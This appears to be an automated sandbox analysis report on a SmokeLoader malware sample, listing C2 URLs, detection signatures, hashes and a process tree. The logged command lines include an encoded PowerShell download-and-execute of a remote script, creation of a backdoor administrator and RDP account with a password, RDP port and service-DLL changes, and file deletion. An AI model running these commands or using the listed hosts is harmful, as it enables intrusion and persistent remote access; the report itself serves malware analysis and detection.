Analysis
- max time kernel: 151s
- max time network: 164s
- platform: windows10_x64
- resource: win10-en-20210920
- submitted: 29-10-2021 04:59
Static task: static1
Behavioral task: behavioral1
- Sample: 42eabd90d252834ba52568b200e09dfd.exe
- Resource: win7-en-20211014
Behavioral task: behavioral2
- Sample: 42eabd90d252834ba52568b200e09dfd.exe
- Resource: win10-en-20210920
General
- Target: 42eabd90d252834ba52568b200e09dfd.exe
- Size: 185KB
- MD5: 42eabd90d252834ba52568b200e09dfd
- SHA1: e758217035e67aa46e475e1b5fb79a7168e03078
- SHA256: 1206fbf7e6a98bf2ac11d17648cb27e3aa514774df47b8c071a4473ca4f382c5
- SHA512: 5c7d18f36093e786f06c3c383747d5f49f31677f091e6d0325d48e1d6f3de45218190a97df447a029ca896b79633a5cf7534da1513a4389eaa85b6d648db9312
Malware Config
Extracted
- https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Extracted
- smokeloader (2020)
- URLs:
  http://brandyjaggers.com/upload/
  http://andbal.com/upload/
  http://alotofquotes.com/upload/
  http://szpnc.cn/upload/
  http://uggeboots.com/upload/
  http://100klv.com/upload/
  http://rapmusic.at/upload/
Signatures
- SmokeLoader
  Modular backdoor trojan in use since 2014.
- suricata: ET MALWARE ServHelper CnC Inital Checkin
- suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
- Grants admin privileges (1 TTPs)
  Uses net.exe to modify the user's privileges.
- Blocklisted process makes network request (9 IoCs)
  Processes:
  flow  pid   process
  49    1576  powershell.exe
  51    1576  powershell.exe
  52    1576  powershell.exe
  53    1576  powershell.exe
  55    1576  powershell.exe
  57    1576  powershell.exe
  59    1576  powershell.exe
  61    1576  powershell.exe
  63    1576  powershell.exe
- Downloads MZ/PE file
- Executes dropped EXE (2 IoCs)
  Processes:
  pid   process
  3948  cawatag
  436   8028.exe
- Modifies RDP port number used by Windows (1 TTPs)
- Sets DLL path for service in the registry (2 TTPs)
  Processes:
  resource                        yara_rule
  \Windows\Branding\mediasrv.png  upx
  \Windows\Branding\mediasvc.png  upx
- Deletes itself (1 IoCs)
  Processes:
  pid   process
  3068
- Loads dropped DLL (2 IoCs)
  Processes:
  pid   process
  948
  948
- Drops file in Program Files directory (4 IoCs)
  Processes: powershell.exe
  - File opened for modification: C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT (powershell.exe)
  - File opened for modification: C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI (powershell.exe)
  - File opened for modification: C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT (powershell.exe)
  - File opened for modification: C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI (powershell.exe)
- Drops file in Windows directory (19 IoCs)
  Processes: powershell.exe, powershell.exe
  - File opened for modification: C:\Windows\branding\Basebrd (powershell.exe)
  - File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_fgdagsei.3oh.psm1 (powershell.exe)
  - File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGID35A.tmp (powershell.exe)
  - File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGID37B.tmp (powershell.exe)
  - File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGID3AA.tmp (powershell.exe)
  - File created: C:\Windows\branding\mediasrv.png (powershell.exe)
  - File created: C:\Windows\branding\wupsvc.jpg (powershell.exe)
  - File opened for modification: C:\Windows\branding\ShellBrd (powershell.exe)
  - File opened for modification: C:\Windows\branding\mediasrv.png (powershell.exe)
  - File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGID33A.tmp (powershell.exe)
  - File opened for modification: C:\Windows\branding\mediasvc.png (powershell.exe)
  - File opened for modification: C:\Windows\branding\wupsvc.jpg (powershell.exe)
  - File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGID3BB.tmp (powershell.exe)
  - File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log (powershell.exe)
  - File created: C:\Windows\branding\mediasvc.png (powershell.exe)
  - File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_vbbt5j3m.hxa.ps1 (powershell.exe)
  - File created: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP (powershell.exe)
  - File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat (powershell.exe)
  - File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (powershell.exe)
- Checks SCSI registry key(s) (3 TTPs, 6 IoCs)
  SCSI information is often read in order to detect sandboxing environments.
  Processes: 42eabd90d252834ba52568b200e09dfd.exe, cawatag
  - Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI (42eabd90d252834ba52568b200e09dfd.exe)
  - Key queried: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI (42eabd90d252834ba52568b200e09dfd.exe)
  - Key enumerated: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI (42eabd90d252834ba52568b200e09dfd.exe)
  - Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI (cawatag)
  - Key queried: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI (cawatag)
  - Key enumerated: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI (cawatag)
- Modifies data under HKEY_USERS (64 IoCs)
- Modifies registry key (1 TTPs, 1 IoCs)
- Runs net.exe
- Script User-Agent (4 IoCs)
  Uses user-agent string associated with script host/environment.
  Processes:
  description             flow  ioc
  HTTP User-Agent header  51    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header  52    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header  53    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header  55    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
- Suspicious behavior: EnumeratesProcesses (64 IoCs)
- Suspicious behavior: GetForegroundWindowSpam (1 IoCs)
  Processes:
  pid   process
  3068
- Suspicious behavior: LoadsDriver (2 IoCs)
  Processes:
  pid   process
  628
  628
- Suspicious behavior: MapViewOfSection (2 IoCs)
  Processes: 42eabd90d252834ba52568b200e09dfd.exe, cawatag
  pid   process
  2092  42eabd90d252834ba52568b200e09dfd.exe
  3948  cawatag
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
- Suspicious use of FindShellTrayWindow (4 IoCs)
  Processes:
  pid   process
  3068
  3068
  3068
  3068
- Suspicious use of SendNotifyMessage (2 IoCs)
  Processes:
  pid   process
  3068
  3068
- Suspicious use of WriteProcessMemory (64 IoCs)
Processes
(indentation reflects the process tree depth reported by the sandbox)
- C:\Users\Admin\AppData\Local\Temp\42eabd90d252834ba52568b200e09dfd.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\42eabd90d252834ba52568b200e09dfd.exe"
  Signatures: Checks SCSI registry key(s); Suspicious behavior: EnumeratesProcesses; Suspicious behavior: MapViewOfSection
- C:\Users\Admin\AppData\Roaming\cawatag
  Command line: C:\Users\Admin\AppData\Roaming\cawatag
  Signatures: Executes dropped EXE; Checks SCSI registry key(s); Suspicious behavior: MapViewOfSection
- C:\Users\Admin\AppData\Local\Temp\8028.exe
  Command line: C:\Users\Admin\AppData\Local\Temp\8028.exe
  Signatures: Executes dropped EXE; Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
    Signatures: Drops file in Windows directory; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xmsfcbbl\xmsfcbbl.cmdline"
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES95F3.tmp" "c:\Users\Admin\AppData\Local\Temp\xmsfcbbl\CSC48866E12B7054C7EA746A5145811453.TMP"
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      Signatures: Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      Signatures: Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      Signatures: Suspicious use of AdjustPrivilegeToken
    - C:\Windows\system32\reg.exe
      Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    - C:\Windows\system32\reg.exe
      Command line: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
      Signatures: Modifies registry key
    - C:\Windows\system32\reg.exe
      Command line: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    - C:\Windows\system32\net.exe
      Command line: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\system32\net1.exe
        Command line: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    - C:\Windows\system32\cmd.exe
      Command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\system32\cmd.exe
        Command line: cmd /c net start rdpdr
        Signatures: Suspicious use of WriteProcessMemory
        - C:\Windows\system32\net.exe
          Command line: net start rdpdr
          Signatures: Suspicious use of WriteProcessMemory
          - C:\Windows\system32\net1.exe
            Command line: C:\Windows\system32\net1 start rdpdr
    - C:\Windows\system32\cmd.exe
      Command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\system32\cmd.exe
        Command line: cmd /c net start TermService
        Signatures: Suspicious use of WriteProcessMemory
        - C:\Windows\system32\net.exe
          Command line: net start TermService
          Signatures: Suspicious use of WriteProcessMemory
          - C:\Windows\system32\net1.exe
            Command line: C:\Windows\system32\net1 start TermService
    - C:\Windows\system32\cmd.exe
      Command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    - C:\Windows\system32\cmd.exe
      Command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
- C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe user WgaUtilAcc 000000 /del
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\system32\net.exe
    Command line: net.exe user WgaUtilAcc 000000 /del
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
- C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe user WgaUtilAcc yGFc362I /add
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\system32\net.exe
    Command line: net.exe user WgaUtilAcc yGFc362I /add
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 user WgaUtilAcc yGFc362I /add
- C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\system32\net.exe
    Command line: net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
- C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\system32\net.exe
    Command line: net.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD
- C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\system32\net.exe
    Command line: net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
- C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe user WgaUtilAcc yGFc362I
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\system32\net.exe
    Command line: net.exe user WgaUtilAcc yGFc362I
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 user WgaUtilAcc yGFc362I
- C:\Windows\System32\cmd.exe
  Command line: cmd.exe /C wmic path win32_VideoController get name
  - C:\Windows\System32\Wbem\WMIC.exe
    Command line: wmic path win32_VideoController get name
    Signatures: Modifies data under HKEY_USERS
- C:\Windows\System32\cmd.exe
  Command line: cmd.exe /C wmic CPU get NAME
  - C:\Windows\System32\Wbem\WMIC.exe
    Command line: wmic CPU get NAME
- C:\Windows\System32\cmd.exe
  Command line: cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  - C:\Windows\system32\cmd.exe
    Command line: cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
      Signatures: Blocklisted process makes network request; Drops file in Program Files directory; Drops file in Windows directory; Modifies data under HKEY_USERS
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Temp\8028.exe
  MD5: 63151e4f7c3972f18a23c0e9996e14ef
  SHA1: 5d041fde6433a8ff8fc78a69fca1fd4630e3f270
  SHA256: cc28e327610e9deb6551c99a32a44fec86220f2840276474ded747580af850d3
  SHA512: f08c402f0a966cbe89fae0b5f9aa8536d6313dada788486a4db422a042769713a2896753acd47223348349b9960b5cde9470cc862668e2cdb90a6fcc1b87c8ec
- C:\Users\Admin\AppData\Local\Temp\RES95F3.tmp
  MD5: 863294897f6932095af97e08ecc6b434
  SHA1: 3b307191d85b4660dfb23d1dd878d38dcbb29724
  SHA256: bcf8f8e7a99ee0529daa81b35eebe848ba042a75cb0f4719c54ad33f8df022bc
  SHA512: 0142df2cf862536b1205432bf91a2cc8fbce437f02dfe0bebce9ab192f6199be02b70aac97322575818ef33e87430987d2e20649a380254d561c80bc6f284a4c
- C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1
  MD5: f783019c5dc4a5477d1ffd4f9f512979
  SHA1: 37c8d1e5dd2ebce647c4e0a92f8598ebf2fdcc7b
  SHA256: 4c81fee866a87b2de6e10640fe094f0db29258014177e294ac94a819940f5348
  SHA512: 64d90352f4466f0097dd2c7ace8ccb155947dda8ae148c8c6ba1507a9e879247fab2eba452c812ba628a65de93cc096dabfcb23d2be4b525a92e5ef9e4b57d6a
- C:\Users\Admin\AppData\Local\Temp\ready.ps1
  MD5: 28d9755addec05c0b24cca50dfe3a92b
  SHA1: 7d3156f11c7a7fb60d29809caf93101de2681aa3
  SHA256: abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
  SHA512: 891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42
- C:\Users\Admin\AppData\Local\Temp\xmsfcbbl\xmsfcbbl.dll
  MD5: 8ce7ac0f8f6057f9565b991efa154458
  SHA1: fa72df9e1ff230798c8cdbcf6fbfccbcbc7c3513
  SHA256: 30f8576364af20522c9d12fa5e87b62f4b57e412ee95aa464ab83cc30ffb5dc2
  SHA512: 67d38cb0ff6682746074724ae85cfb2b51856d177cb794095dde0a38373f5d0bea93418e8bf2545e1a24a272d1c6f4c3802752d6d3f37ca7a57ea447523826e2
- C:\Users\Admin\AppData\Roaming\cawatag
  MD5: 42eabd90d252834ba52568b200e09dfd
  SHA1: e758217035e67aa46e475e1b5fb79a7168e03078
  SHA256: 1206fbf7e6a98bf2ac11d17648cb27e3aa514774df47b8c071a4473ca4f382c5
  SHA512: 5c7d18f36093e786f06c3c383747d5f49f31677f091e6d0325d48e1d6f3de45218190a97df447a029ca896b79633a5cf7534da1513a4389eaa85b6d648db9312
-
\??\c:\Users\Admin\AppData\Local\Temp\xmsfcbbl\CSC48866E12B7054C7EA746A5145811453.TMP
MD5
d5484fcf366ce18b735a66bde9c1a320
SHA1
4ed0e815e04872633e778764cf3a6b624e94e996
SHA256
593ba79923692ec4fbec29cd23e4d6dc75811c96f647c0a7be5efdbe8f2cba7b
SHA512
30bfec2ba54393f9a7a0c6497ab472157c43c1e2b0e14699ce42a5ae90e37cf0c6f6ccfb207157d5ef0f4cb56355e03b823a339e33cab170c64f1b329e40acd7
-
\??\c:\Users\Admin\AppData\Local\Temp\xmsfcbbl\xmsfcbbl.0.cs
MD5
9f8ab7eb0ab21443a2fe06dab341510e
SHA1
2b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256
e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA512
53f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b
-
\??\c:\Users\Admin\AppData\Local\Temp\xmsfcbbl\xmsfcbbl.cmdline
MD5
49133c57c4a5f16cb2180b6236955cae
SHA1
8a9c66292ab437adfe93def05f09af1c21c20fd7
SHA256
5a156c7c6f567ddaf39025e0b70400b53ba3c5213abd8d56cab9ba2d840d2d6e
SHA512
5b85c987d51fce13854306d168f73ec50debd9e4639139dfefe5a742a9b3466f485f6745abc55d89baa78145ede458be2224b21d22d74c797355bd219cecaa4b
-
\Windows\Branding\mediasrv.png
MD5
ac13d804585a74dc542db4ec94da39df
SHA1
8642ae2e04e492700caf41b43de9ef9d8b3c26f9
SHA256
84c41dc018689fcb2fc4240f1e0267a5ee82232e3bcd541f5f5bed4139cfcd55
SHA512
0ba869487fda38d398903df4235bd8f2d0f8fb774b559125ba278751a5a503adbb0557f9ea2fde5fecba4f1a33b71583be36fac0f6f8842cbee0bdd7ea2fb5bf
-
\Windows\Branding\mediasvc.png
MD5
9151c95451abb048a44f98d0afac8264
SHA1
22f447b210eb25c11be5a9c31f254f5f2bd50a78
SHA256
8082bfe8a9f63854d6317cf6ddc0c18c54140ee5d179a96bfe9900c90d994518
SHA512
728b140e68dcb6751cccb4d1046ac61f63e8db13d4f613b44e161d457f107acc11b3275167c7b4dff34a6d5966116ecb062f94713d0cf4f35b327d14ec7cbd13
-
memory/352-386-0x0000000000000000-mapping.dmp
-
memory/436-130-0x000001DFA6F23000-0x000001DFA6F25000-memory.dmp
Filesize
8KB
-
memory/436-131-0x000001DFA6F25000-0x000001DFA6F26000-memory.dmp
Filesize
4KB
-
memory/436-132-0x000001DFA6F26000-0x000001DFA6F27000-memory.dmp
Filesize
4KB
-
memory/436-129-0x000001DFA6F20000-0x000001DFA6F22000-memory.dmp
Filesize
8KB
-
memory/436-124-0x0000000000000000-mapping.dmp
-
memory/436-127-0x000001DFBFC20000-0x000001DFC001F000-memory.dmp
Filesize
4.0MB
-
memory/1088-380-0x0000000000000000-mapping.dmp
-
memory/1236-146-0x0000026D19B40000-0x0000026D19B42000-memory.dmp
Filesize
8KB
-
memory/1236-134-0x0000000000000000-mapping.dmp
-
memory/1236-141-0x0000026D01790000-0x0000026D01792000-memory.dmp
Filesize
8KB
-
memory/1236-142-0x0000026D01790000-0x0000026D01792000-memory.dmp
Filesize
8KB
-
memory/1236-143-0x0000026D01790000-0x0000026D01792000-memory.dmp
Filesize
8KB
-
memory/1236-144-0x0000026D01790000-0x0000026D01792000-memory.dmp
Filesize
8KB
-
memory/1236-145-0x0000026D1BD10000-0x0000026D1BD11000-memory.dmp
Filesize
4KB
-
memory/1236-171-0x0000026D19B48000-0x0000026D19B49000-memory.dmp
Filesize
4KB
-
memory/1236-147-0x0000026D19B43000-0x0000026D19B45000-memory.dmp
Filesize
8KB
-
memory/1236-139-0x0000026D01790000-0x0000026D01792000-memory.dmp
Filesize
8KB
-
memory/1236-149-0x0000026D01790000-0x0000026D01792000-memory.dmp
Filesize
8KB
-
memory/1236-168-0x0000026D1C6D0000-0x0000026D1C6D1000-memory.dmp
Filesize
4KB
-
memory/1236-138-0x0000026D01790000-0x0000026D01792000-memory.dmp
Filesize
8KB
-
memory/1236-137-0x0000026D01790000-0x0000026D01792000-memory.dmp
Filesize
8KB
-
memory/1236-167-0x0000026D1C340000-0x0000026D1C341000-memory.dmp
Filesize
4KB
-
memory/1236-135-0x0000026D01790000-0x0000026D01792000-memory.dmp
Filesize
8KB
-
memory/1236-136-0x0000026D01790000-0x0000026D01792000-memory.dmp
Filesize
8KB
-
memory/1236-140-0x0000026D1BB60000-0x0000026D1BB61000-memory.dmp
Filesize
4KB
-
memory/1236-160-0x0000026D1BCC0000-0x0000026D1BCC1000-memory.dmp
Filesize
4KB
-
memory/1236-161-0x0000026D19B46000-0x0000026D19B48000-memory.dmp
Filesize
8KB
-
memory/1268-366-0x0000000000000000-mapping.dmp
-
memory/1332-156-0x0000000000000000-mapping.dmp
-
memory/1356-383-0x0000000000000000-mapping.dmp
-
memory/1368-381-0x0000000000000000-mapping.dmp
-
memory/1392-387-0x0000000000000000-mapping.dmp
-
memory/1392-326-0x0000000000000000-mapping.dmp
-
memory/1540-373-0x0000000000000000-mapping.dmp
-
memory/1552-384-0x0000000000000000-mapping.dmp
-
memory/1576-411-0x00000211547E3000-0x00000211547E5000-memory.dmp
Filesize
8KB
-
memory/1576-394-0x0000000000000000-mapping.dmp
-
memory/1576-410-0x00000211547E0000-0x00000211547E2000-memory.dmp
Filesize
8KB
-
memory/1576-412-0x00000211547E6000-0x00000211547E8000-memory.dmp
Filesize
8KB
-
memory/1576-430-0x00000211547E8000-0x00000211547E9000-memory.dmp
Filesize
4KB
-
memory/1664-379-0x0000000000000000-mapping.dmp
-
memory/1688-376-0x0000000000000000-mapping.dmp
-
memory/1736-393-0x0000000000000000-mapping.dmp
-
memory/1772-184-0x0000020C4D540000-0x0000020C4D542000-memory.dmp
Filesize
8KB
-
memory/1772-186-0x0000020C4D540000-0x0000020C4D542000-memory.dmp
Filesize
8KB
-
memory/1772-176-0x0000000000000000-mapping.dmp
-
memory/1772-235-0x0000020C4F458000-0x0000020C4F45A000-memory.dmp
Filesize
8KB
-
memory/1772-177-0x0000020C4D540000-0x0000020C4D542000-memory.dmp
Filesize
8KB
-
memory/1772-178-0x0000020C4D540000-0x0000020C4D542000-memory.dmp
Filesize
8KB
-
memory/1772-179-0x0000020C4D540000-0x0000020C4D542000-memory.dmp
Filesize
8KB
-
memory/1772-180-0x0000020C4D540000-0x0000020C4D542000-memory.dmp
Filesize
8KB
-
memory/1772-181-0x0000020C4D540000-0x0000020C4D542000-memory.dmp
Filesize
8KB
-
memory/1772-183-0x0000020C4D540000-0x0000020C4D542000-memory.dmp
Filesize
8KB
-
memory/1772-185-0x0000020C4D540000-0x0000020C4D542000-memory.dmp
Filesize
8KB
-
memory/1772-192-0x0000020C4F456000-0x0000020C4F458000-memory.dmp
Filesize
8KB
-
memory/1772-189-0x0000020C4F453000-0x0000020C4F455000-memory.dmp
Filesize
8KB
-
memory/1772-190-0x0000020C4D540000-0x0000020C4D542000-memory.dmp
Filesize
8KB
-
memory/1772-188-0x0000020C4F450000-0x0000020C4F452000-memory.dmp
Filesize
8KB
-
memory/2040-390-0x0000000000000000-mapping.dmp
-
memory/2092-117-0x0000000000030000-0x0000000000038000-memory.dmp
Filesize
32KB
-
memory/2092-118-0x00000000001D0000-0x00000000001D9000-memory.dmp
Filesize
36KB
-
memory/2092-119-0x0000000000400000-0x0000000002EF4000-memory.dmp
Filesize
43.0MB
-
memory/2272-477-0x0000000000000000-mapping.dmp
-
memory/2304-375-0x0000000000000000-mapping.dmp
-
memory/2412-327-0x0000000000000000-mapping.dmp
-
memory/2412-388-0x0000000000000000-mapping.dmp
-
memory/2548-370-0x0000000000000000-mapping.dmp
-
memory/2548-476-0x0000000000000000-mapping.dmp
-
memory/2628-328-0x0000000000000000-mapping.dmp
-
memory/3068-120-0x0000000000CE0000-0x0000000000CF6000-memory.dmp
Filesize
88KB
-
memory/3068-133-0x0000000000DB0000-0x0000000000DC6000-memory.dmp
Filesize
88KB
-
memory/3108-385-0x0000000000000000-mapping.dmp
-
memory/3168-374-0x0000000000000000-mapping.dmp
-
memory/3424-153-0x0000000000000000-mapping.dmp
-
memory/3496-369-0x0000000000000000-mapping.dmp
-
memory/3564-389-0x0000000000000000-mapping.dmp
-
memory/3568-264-0x0000000000000000-mapping.dmp
-
memory/3568-308-0x000002AE26C56000-0x000002AE26C58000-memory.dmp
Filesize
8KB
-
memory/3568-309-0x000002AE26C58000-0x000002AE26C5A000-memory.dmp
Filesize
8KB
-
memory/3568-277-0x000002AE26C53000-0x000002AE26C55000-memory.dmp
Filesize
8KB
-
memory/3568-276-0x000002AE26C50000-0x000002AE26C52000-memory.dmp
Filesize
8KB
-
memory/3588-365-0x0000000000000000-mapping.dmp
-
memory/3696-382-0x0000000000000000-mapping.dmp
-
memory/3796-372-0x0000000000000000-mapping.dmp
-
memory/3808-371-0x0000000000000000-mapping.dmp
-
memory/3808-392-0x0000000000000000-mapping.dmp
-
memory/3892-391-0x0000000000000000-mapping.dmp
-
memory/3948-123-0x0000000000400000-0x0000000002EF4000-memory.dmp
Filesize
43.0MB
-
memory/4064-274-0x000001D87DEE6000-0x000001D87DEE8000-memory.dmp
Filesize
8KB
-
memory/4064-221-0x0000000000000000-mapping.dmp
-
memory/4064-236-0x000001D87DEE0000-0x000001D87DEE2000-memory.dmp
Filesize
8KB
-
memory/4064-275-0x000001D87DEE8000-0x000001D87DEEA000-memory.dmp
Filesize
8KB
-
memory/4064-237-0x000001D87DEE3000-0x000001D87DEE5000-memory.dmp
Filesize
8KB